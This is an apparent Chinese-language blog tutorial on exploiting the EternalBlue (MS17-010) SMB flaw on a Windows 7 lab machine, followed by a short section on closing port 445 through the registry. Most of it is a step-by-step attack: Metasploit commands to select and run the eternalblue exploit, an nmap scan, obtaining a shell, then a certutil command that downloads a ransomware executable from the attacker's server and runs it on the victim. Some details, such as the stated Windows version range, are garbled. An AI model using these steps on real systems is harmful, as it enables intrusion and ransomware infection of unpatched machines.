永恒之蓝windows7 下的渗透测试

漏洞介绍

永恒之蓝是影子经纪人黑客组织攻破美国NSA黑客组织后公布的漏洞工具之一。

2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

代号 MS17-010

window版本为(windowsxp-windows server20012)
这里的测试版为windows7 企业版,运用工具msf,namp.
测试攻击机为kali linux ,测试机为windows7 旗舰版
linux版本下还没测试,稍后补上。

实现条件

  • 部署了存在漏洞的samba协议的版本,并对外开启445端口
  • 匿名访问用户对文件有可读权限
  • 需要知道共享目录的物理漏洞

过程如下

首先打开kali下的msfconsole

msfconsole

永恒之蓝windows7 下的渗透测试_第1张图片

search 17-010

可能会出现如下的情况

Module database cache not built yet, using slow search

执行如下三条命令

root@kali:~# service postgresql start

root@kali:~# msfdb init

msf > db_rebuild_cache

我们使用下面的ms17_010_eternalblue
永恒之蓝windows7 下的渗透测试_第2张图片

msf>use exploit/windows/smb/ms17_010_eternalblue


亲测上面的smb_ms17_010 拿不到shell

查看下命令的参数

show options

永恒之蓝windows7 下的渗透测试_第3张图片
查看到必须配置的参数为主机名称,和主机开放445 端口,可以用nmap扫描目标是否开放了445端口


nmap 192.168.28.131 -p 445

永恒之蓝windows7 下的渗透测试_第4张图片
可以看到,端口开放,可以测试主机

set RHOST 192.168.28.131


再次查看参数,主机已经添加成功
永恒之蓝windows7 下的渗透测试_第5张图片

开始测试

run

永恒之蓝windows7 下的渗透测试_第6张图片
成功拿到shell,为所欲为

由于linux下使用utf-8编码,而windows使用的是gbk,所以,我们对kali终端设置语言编码

永恒之蓝windows7 下的渗透测试_第7张图片
这时,我们看到清晰的显示出cmd的内容

进入c盘,并创建一个名为test的文件夹
永恒之蓝windows7 下的渗透测试_第8张图片

进入文件夹下,下载我们放在服务器上的病毒

certutil -urlcache -split -f +网址  [名称]

永恒之蓝windows7 下的渗透测试_第9张图片
永恒之蓝windows7 下的渗透测试_第10张图片
1.exe 存在

运行勒索病毒,成功植入

执行1.exe
永恒之蓝windows7 下的渗透测试_第11张图片
永恒之蓝windows7 下的渗透测试_第12张图片

防御方法

目前windows 10系统已经打上补丁,对于可以被攻击的版本,要开启所有防火墙,至少在扫描445端口是否开放可以防御住,用不到samba协议时要随时关闭445端口

关闭445端口
打开注册表

  1. win+R
  2. 输入regedit
  3. 依次打开目录HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters

永恒之蓝windows7 下的渗透测试_第13张图片

如已关闭445端口可以看到SMBDeviceEnabled这个项,类型为REG_DWORD

将数值1改为0,就关闭了445 端口
永恒之蓝windows7 下的渗透测试_第14张图片
如果确实不需要这个协议,删了这个选项也可以,用时可以新创建

  1. 右键点击项目修改,修改数值为1(如没有在Parameters目录下添加一个DWORD键值——名称:SMBDeviceEnabled 类型:REG_DWORD 数值:1)
  2. 重新启动,运行–cmd–输入netstat -an,可以看到已打开445端口。

永恒之蓝windows7 下的渗透测试_第15张图片
可以看到是开放中。

你可能感兴趣的:(漏洞测试)